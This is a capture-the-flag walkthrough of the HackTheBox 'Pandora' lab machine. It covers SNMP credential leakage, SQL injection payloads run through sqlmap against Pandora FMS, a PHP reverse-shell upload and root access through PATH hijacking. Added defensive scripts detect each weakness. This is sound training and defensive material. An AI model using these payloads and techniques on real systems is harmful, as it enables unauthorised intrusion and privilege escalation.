HackTheBox walkthrough
Introduction
OS: Linux
Difficulty: Easy
Points: 20
Release: 08 Jan 2022
IP: 10.10.11.136
Enumeration
NMAP
```text
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.136
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We see that TCP ports 22 (SSH) and 80 (HTTP) are open. Let's check what port 80 gives us.
Navigating the website, all pages seem to be static and no dynamic content is shown. There is one form for sending a message to the admins, but it does nothing except refresh the page. There is also no robots.txt that might reveal some juicy info. Maybe there are some interesting hidden directories; let's fire up gobuster!
```text
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# gobuster dir -u http://10.10.11.136 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/12 00:51:23 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.136/assets/]
```
Gobuster gives nothing interesting except the /assets directory, which contains JavaScript and CSS files and some images. This is probably the directory from which the main website fetches its content.
At this point we don’t have much to work with. Let’s try a UDP scan.
```text
nmap -sU -sC -sV -v 10.10.11.136
Discovered open port 161/udp on 10.10.11.136
```
We get one open port, UDP 161 (SNMP). Let's see what it has to offer: we run snmpwalk with the public community string.
public is the default community string on most SNMP servers, which is why I tried it first; if it does not work, one might have to brute-force the community string.
```text
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# snmpwalk -v 2c 10.10.11.136 -c public | grep daniel
iso.3.6.1.2.1.25.4.2.1.5.817 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.1119 = STRING: "-u daniel -p HotelBabylon23"
```
snmpwalk gives us a bunch of details, but the most interesting one is the credentials of the user daniel: a process is running whose command line includes them, and SNMP hands out process command lines to anyone who knows the community string.
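The rows above come from the hrSWRunParameters table (HOST-RESOURCES-MIB, OID 1.3.6.1.2.1.25.4.2.1.5), which exposes every process's arguments. As an added defensive example, not part of the original walkthrough, the script below parses snmpwalk output in that form and flags credential-looking arguments, so an administrator can run it against their own hosts; the sample rows are the two from the walkthrough plus constructed harmless ones.

```python
import re

# hrSWRunParameters (HOST-RESOURCES-MIB, 1.3.6.1.2.1.25.4.2.1.5) as snmpwalk prints it
# without MIB names: the row index is the PID, the value is the process's argument string.
HR_SW_RUN_PARAMETERS = re.compile(
    r'^iso\.3\.6\.1\.2\.1\.25\.4\.2\.1\.5\.(\d+) = STRING: "(.*)"\s*$')

# Flags whose following argument is normally a secret, and key=value names that usually are.
SECRET_FLAGS = {"-p", "--password", "--pass", "--token", "--secret"}
SECRET_KEY = re.compile(r"^-{0,2}\w*(pass|pwd|secret|token)\w*=(.+)$", re.IGNORECASE)


def secrets_in_cmdline(params):
    """Return secret-looking values found in one process argument string."""
    # Quotes become spaces so a nested "bash -c '...'" command line is tokenised as well.
    tokens = re.sub(r"""['"]""", " ", params).split()
    found = []
    for i, tok in enumerate(tokens):
        if tok in SECRET_FLAGS and i + 1 < len(tokens):
            found.append(tokens[i + 1])
            continue
        m = SECRET_KEY.match(tok)
        if m:
            found.append(m.group(2))
    return found


def find_credential_leaks(snmpwalk_output):
    """Map PID -> secret-looking arguments for every hrSWRunParameters row in the walk."""
    leaks = {}
    for line in snmpwalk_output.splitlines():
        m = HR_SW_RUN_PARAMETERS.match(line.strip())
        if not m:
            continue
        hits = secrets_in_cmdline(m.group(2))
        if hits:
            leaks[int(m.group(1))] = hits
    return leaks


# Constructed sample: the two rows quoted in the walkthrough plus two harmless processes.
SAMPLE_WALK = r'''
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "splash"
iso.3.6.1.2.1.25.4.2.1.5.817 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.1119 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1200 = STRING: "-k start -DFOREGROUND"
'''

if __name__ == "__main__":
    for pid, hits in sorted(find_credential_leaks(SAMPLE_WALK).items()):
        print(f"PID {pid}: credential-looking argument(s) {hits}")
```

Any hit means a secret is readable by whoever can query SNMP; the fix is to pass credentials via a configuration file or environment rather than argv, and to restrict the community string and view so hrSWRun is not world-readable.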
Let's SSH into the box with the obtained credentials. The user daniel does not have a lot of privileges. Looking at /etc/passwd, there is one other user, matt, who might have more. Looking around the system, we see that besides the static website we saw earlier there is another web app called pandora. Judging by the sites-enabled config there seems to be no way to reach it from outside, but making a curl request from localhost on the victim shows something interesting.
It seems like only the localhost might have access to that website. Let’s create an ssh tunnel to port 80 so that we can view the website from our machine.
```text
ssh -L 80:localhost:80 daniel@10.10.11.136
```
The pandora console opens and asks for credentials.
Common login credentials like admin/admin and admin/password don't work. Googling Pandora tells us it is a monitoring system (Pandora FMS). Moreover, the version is clearly visible at the bottom of the login page: v7.0NG.742. Searching for an exploit specific to this version, we come across a very interesting article.
```text
┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
......
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-4214' OR 7546=7546#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=''' OR (SELECT 8036 FROM(SELECT COUNT(*),CONCAT(0x716b7a6a71,(SELECT (ELT(8036=8036,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HLHR
```
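From the defender's side, the injection above is easy to spot in the web server logs: a legitimate PHP session identifier contains only letters, digits, commas and hyphens, so anything else in session_id on chart_generator.php is an attack. The following detector is an added example, not part of the original post; the Apache access-log lines are constructed, with the boolean-based payload taken from the sqlmap output above and a shortened error-based one.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log: client, timestamp, request line, status (trailing fields ignored).
ACCESS_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# PHP session identifiers are drawn from this alphabet only (session.sid_bits_per_character <= 6).
VALID_SESSION_ID = re.compile(r"^[A-Za-z0-9,-]{1,128}$")

VULNERABLE_PATH = "/pandora_console/include/chart_generator.php"


def suspicious_session_ids(log_text):
    """Return (client, timestamp, decoded session_id) for each chart_generator.php request
    whose session_id cannot be a legitimate PHP session identifier."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != VULNERABLE_PATH:
            continue
        # parse_qs splits on '&'/'=' first and then percent-decodes each value once.
        for sid in parse_qs(url.query, keep_blank_values=True).get("session_id", []):
            if not VALID_SESSION_ID.match(sid):
                hits.append((m.group("client"), m.group("ts"), sid))
    return hits


# Constructed log lines: a normal console user, the two sqlmap-style requests (URL-encoded as
# Apache records them), and an unrelated request to another console page.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Jan/2022:14:10:02 +0000] "GET /pandora_console/include/chart_generator.php?session_id=g4e01qdgk36mfdh90hvcc54umq HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.17.32 - - [12/Jan/2022:14:12:41 +0000] "GET /pandora_console/include/chart_generator.php?session_id=-4214%27%20OR%207546%3D7546%23 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.17.32 - - [12/Jan/2022:14:12:42 +0000] "GET /pandora_console/include/chart_generator.php?session_id=%27%27%27%20OR%20%28SELECT%208036%20FROM%28SELECT%20COUNT%28%2A%29%29x%29--%20HLHR HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jan/2022:14:13:00 +0000] "GET /pandora_console/index.php?sec=view HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for client, ts, sid in suspicious_session_ids(SAMPLE_LOG):
        print(f"{ts} {client} injected session_id={sid!r}")
```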
The dump of tsessions_php contains the stored PHP session identifiers, which is how we get into the console as admin. After logging in as admin, we snoop around a bit and see that there is a file upload option. The system is evidently written in PHP, so let's use the good old php-reverse-shell.
Go to admin tools -> file manager.
We upload the shell, start a listener on port 9000 on our machine and navigate to the uploaded shell in the browser.
```text
System information as of Wed 12 Jan 14:40:31 UTC 2022

  System load:  0.14               Processes:             262
  Usage of /:   63.0% of 4.87GB    Users logged in:       2
  Memory usage: 8%                 IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Jan 12 14:39:39 2022 from 10.10.17.32
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:~$ whoami
matt
```
After logging in, the first thing we do is fetch linpeas.sh onto the target system. Running linpeas gives some juicy info, but the most eye-catching item is a binary called pandora_backup with the SUID bit set.
Looking at the contents of the binary, we see that it uses tar to uncompress something from /root. Since tar is not called with an absolute path, we can use PATH hijacking to obtain root.
We create a local file named tar with the contents "/bin/sh", add its directory to our PATH environment variable and run the binary; we get root and our last flag inside /root.
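The root cause is a privileged program that lets the caller's PATH decide which tar runs; the fix is to invoke helpers by absolute path (or reset PATH before exec) and, ideally, not to be SUID at all. As an added example, not part of the original walkthrough, the audit below finds SUID/SGID binaries whose embedded strings start with a bare utility name, the same clue the author found by reading pandora_backup; SAMPLE_BLOB is a constructed stand-in for such a binary's data, not the real file.

```python
import os
import re
import stat

# Utilities that privileged helpers commonly shell out to. Embedded without a leading '/',
# the PATH of whoever runs the SUID binary decides which executable actually runs.
RELATIVE_CMD = re.compile(
    rb"^(?:tar|sh|bash|cp|mv|rm|cat|gzip|gunzip|chmod|chown|service|systemctl)\s+\S")
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # same idea as the `strings` utility


def relative_command_refs(blob):
    """Return embedded strings that invoke a utility by bare name, e.g. 'tar -cvf ...'."""
    return [s.decode() for s in PRINTABLE.findall(blob) if RELATIVE_CMD.match(s)]


def is_suid_or_sgid(path):
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def audit_suid_binaries(root="/"):
    """Walk `root` and report SUID/SGID files whose strings contain bare-name commands."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if not is_suid_or_sgid(path):
                    continue
                with open(path, "rb") as f:
                    refs = relative_command_refs(f.read())
            except OSError:
                continue  # unreadable or vanished file
            if refs:
                findings[path] = refs
    return findings


# Constructed stand-in for a backup helper's read-only data: one PATH-dependent 'tar'
# invocation (the defect described above) and one fully qualified call that is not flagged.
SAMPLE_BLOB = (b"\x7fELF\x02\x01\x01\x00\x00Backup...\x00"
               b"tar -cvf /root/backup.tar /var/www/pandora\x00"
               b"/usr/bin/tar -cvf /tmp/safe.tar /etc/hosts\x00"
               b"PATH=/usr/bin:/bin\x00")

if __name__ == "__main__":
    for path, refs in audit_suid_binaries("/usr/bin").items():
        print(path, "->", refs)
```

The string match is a heuristic (a command name may be assembled at runtime), so treat a hit as a prompt to review the binary, not as proof of a flaw.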